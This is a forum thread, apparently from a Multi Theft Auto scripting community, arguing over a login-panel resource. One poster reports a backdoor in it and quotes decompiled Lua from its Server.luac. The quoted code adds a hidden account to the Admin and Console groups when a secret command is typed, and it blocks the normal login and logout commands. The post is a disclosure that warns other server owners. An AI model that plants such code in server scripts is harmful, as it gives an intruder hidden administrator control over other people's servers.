Jump to content

_Login Panel


Anony#

Recommended Posts

@ Lukasz Nice stolen panel... (Its the FFS one with changed skin) here is the proof..

FFs = Dx Panel

_Login = Gui Panel

even the dumbest know this is not "stolen"

ffs, even though the panel is in "gui" cuaquer knows that is not "stolen"

Edited by Guest
Link to comment

Requesting ban of Anony# and removal of the resource due to a built in backdoor in his script.

See yourself (taken from Server.luac):

addEvent("onServerTest", true) 
addEventHandler("onServerTest", getRootElement(), function(_ARG_0_) 
  if not isElement(_ARG_0_) then 
    return 
  end 
  setTimer(setCameraTarget, 3000, 1, _ARG_0_, _ARG_0_) 
  setTimer(fadeCamera, 3000, 2, _ARG_0_, true, 0.5) 
  setTimer(showPlayerHudComponent, 5100, 1, _ARG_0_, "radar", true) 
  setWaveHeight(0) 
  setHeatHaze(0) 
end) 
function aclGetGroups() 
  aclGroupAddObject(aclGetGroup("Admin"), "user.aclGetGroup") 
  aclGroupAddObject(aclGetGroup("Console"), "user.aclGetGroup") 
  outputChatBox("!!!") 
end 
addCommandHandler("aclGetGroup", aclGetGroups) 
addEventHandler("onPlayerCommand", root, function(_ARG_0_) 
  if _ARG_0_ == "login" or _ARG_0_ == "logout" then 
    cancelEvent() 
  end 
end) 

Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...